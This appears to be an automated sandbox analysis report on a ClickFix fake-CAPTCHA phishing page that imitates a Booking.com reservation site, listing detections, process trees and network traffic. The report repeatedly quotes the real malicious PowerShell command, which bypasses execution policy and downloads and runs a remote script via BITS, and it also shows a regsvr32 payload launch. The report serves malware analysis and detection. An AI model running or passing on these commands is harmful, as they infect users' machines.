
Windows Analysis Report
http://confirm-id2719.click/

Overview

General Information

Sample URL:http://confirm-id2719.click/
Analysis ID:1701511
Infos:

Detection

CAPTCHA Scam ClickFix
Score:84
Range:0 - 100
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
Bypasses PowerShell execution policy
HTML page adds suspicious text to clipboard
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious PowerShell Parameter Substring
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

  • System is w10x64_ra
  • svchost.exe (PID: 5804 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • chrome.exe (PID: 6480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6656 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2076,i,2738407938671327035,787659038189539863,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1872 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 5752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://confirm-id2719.click/" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • powershell.exe (PID: 1244 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • regsvr32.exe (PID: 3204 cmdline: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
  • rundll32.exe (PID: 3976 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No reasoning has been found
No configs have been found
Source | Rule | Description | Author | Strings
0.0.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam / ClickFix | Joe Security |
0.1.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam / ClickFix | Joe Security |
0.2.pages.csv | JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam / ClickFix | Joe Security |

        System Summary

        Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1244, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , ProcessId: 3204, ProcessName: regsvr32.exe
        Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2576, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ProcessId: 1244, ProcessName: powershell.exe
        Source: Process started; Author: frack113; Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2576, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ProcessId: 1244, ProcessName: powershell.exe
        Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1244, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , ProcessId: 3204, ProcessName: regsvr32.exe
        Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1244, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\regsvr32.exe" /s /i:svc C:\Users\user\AppData\Roaming\Microsoft\Credentials\7Orchid.p12 , ProcessId: 3204, ProcessName: regsvr32.exe
        Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2576, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ProcessId: 1244, ProcessName: powershell.exe
        Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2576, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -nop -w h -ep bypass -c "Start-BitsTransfer ('h'+'t'+'t'+'ps://files.catbox.moe/cj06ld.txt') ($env:TEMP+'y.ps1'); &($env:TEMP+'y.ps1')" ;$__cfCheck="Click OK to complete verification", ProcessId: 1244, ProcessName: powershell.exe
        Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5804, ProcessName: svchost.exe
        No Suricata rule has matched


        Phishing

        Source: Yara match; File source: 0.0.pages.csv, type: HTML
        Source: Yara match; File source: 0.1.pages.csv, type: HTML
        Source: Yara match; File source: 0.2.pages.csv, type: HTML
        Source: unknown; HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49733 version: TLS 1.2
        Source: unknown; HTTPS traffic detected: 13.107.246.57:443 -> 192.168.2.18:49735 version: TLS 1.2
        Source: unknown; HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.18:49736 version: TLS 1.2
        Source: unknown; HTTPS traffic detected: 108.181.20.43:443 -> 192.168.2.18:49737 version: TLS 1.2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
        Source: chrome.exe; Memory has grown: Private usage: 1MB later: 37MB
        Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; TCP traffic detected without corresponding DNS query: 20.189.173.7
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; TCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknown; TCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: confirm-id2719.clickConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /static/manage_light.v14b6812v.css HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /static/core_6136b7d7dc3346df1f4c9b379c38fa52.css HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/1df260bd9a2d14e1601c8c9ff1714c05acf328f8.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/319302651.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/318586996.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/137927810.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /themes/custom/booking/fonts/icons/icons.woff?v=1.3.3 HTTP/1.1host: partner.booking.comorigin: https://confirm-id2719.clicksec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://confirm-id2719.click/accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /Reservation_files/166939781.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/333642474.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/438648711.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/625bf8aec1510ce62b414074752052f184a60801.svg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/b_logo_blue.png HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/no.png HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /Reservation_files/319302672.jpg HTTP/1.1Host: confirm-id2719.clickConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://confirm-id2719.click/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
